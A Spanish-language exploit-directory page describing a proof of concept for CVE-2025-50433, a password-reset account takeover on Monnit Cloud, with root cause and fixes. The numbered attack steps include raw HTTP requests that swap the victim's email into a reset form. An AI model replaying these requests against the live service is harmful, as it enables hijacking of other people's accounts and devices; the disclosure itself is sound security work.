Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50433 — Prueba de concepto para una toma de control crítica de cuentas en Monnit Cloud (CVE-2025-50433), que explota la falta de validación de token-correo en el restablecimiento de contraseña y proporciona pasos de ataque, causa raíz y remediación. | Kitploit
Herramientas/GitHubGitHub/0xmandor/cve-2025-50433
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticación
GitHub0xmandor/cve-2025-50433

CVE-2025-50433

Prueba de concepto para una toma de control crítica de cuentas en Monnit Cloud (CVE-2025-50433), que explota la falta de validación de token-correo en el restablecimiento de contraseña y proporciona pasos de ataque, causa raíz y remediación.

Ver Repositorio
12hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-50433 — Vulnerabilidad crítica de apropiación de cuentas que afecta a las plataformas Monnit Cloud (*.imonnit.com)

Resumen

Existe una vulnerabilidad crítica de autenticación en *.imonnit.com que permite la apropiación total de cuentas (ATO) en cualquier cuenta de usuario sin interacción de la víctima. El backend no valida la asociación entre el token de restablecimiento de contraseña y el correo electrónico objetivo, lo que permite a los atacantes usar su propio token de restablecimiento válido para restablecer la contraseña de cualquier cuenta de víctima.


Vector de ataque (PoC paso a paso)

  1. El atacante crea la cuenta A ([email protected]).
  2. La víctima tiene la cuenta B ([email protected]).
  3. El atacante solicita el restablecimiento de contraseña tanto para A como para B.
  4. El atacante recibe un token de restablecimiento válido solo para la cuenta A.
  5. El atacante abre el formulario de restablecimiento de contraseña usando el token A:
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. Antes de enviar, el atacante cambia los campos de correo electrónico y nombre de usuario al correo de la víctima:
    POST /Account/PasswordReset/?VerificationCode=TTT4EB4I HTTP/1.1
    Host: www.imonnit.com
    Cookie: ASP.NET_SessionId=jf3y4eg3qdrefnfnqcj42yut; __RequestVerificationToken=dObesuZNYwsn9USVixM8aZTa9i_E_18PRpfCE0L39NUJlfolWpjSYX0BW32_mK50O5fcGbr3oBMg2S6D4ONl0bJhJS4kmxtHeQEn8Y0kNNt324q5Hc0Gu3JBHH7CwrylvP8XNQ2

    __RequestVerificationToken=-realtoken5K0nzPC8H2Aw2&NewPassword=1!Password%21&ConfirmPassword=1!Password%21&[email protected]&[email protected]
  1. El backend acepta incorrectamente el correo electrónico + token no coincidentes.
  2. Se restablece la contraseña de la víctima y el atacante obtiene acceso completo a la cuenta de la víctima.

Impacto

  • Apropiación total de cuentas (ATO).
  • Acceso completo a los paneles de control, sensores y datos de la cuenta de la víctima.
  • Capacidad de modificar dispositivos, notificaciones y configuraciones.
  • Escalada de privilegios sin interacción de la víctima.
  • Explotación remota sin requisitos previos.

Gravedad

CVSS 3.1: 9.8 (Crítico)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Dominios afectados

*.imonnit.com

Causa raíz

El endpoint de restablecimiento de contraseña no valida que el token de restablecimiento pertenezca al mismo correo electrónico proporcionado durante la operación de restablecimiento, lo que permite restablecimientos arbitrarios de contraseña utilizando tokens controlados por el atacante.


Endpoint afectado

/Account/PasswordReset/

Vendedor: Monnit Corporation


Recomendaciones

  • Imponer una validación estricta de vinculación token-correo en el backend.
  • Rechazar cualquier solicitud de restablecimiento de contraseña donde el token no coincida con la cuenta asociada.
  • Invalidar los tokens inmediatamente después de su uso.

Descubridor

Mohamed Mandor (0xmandor) GitHub: https://github.com/0xmandor

Descargar herramienta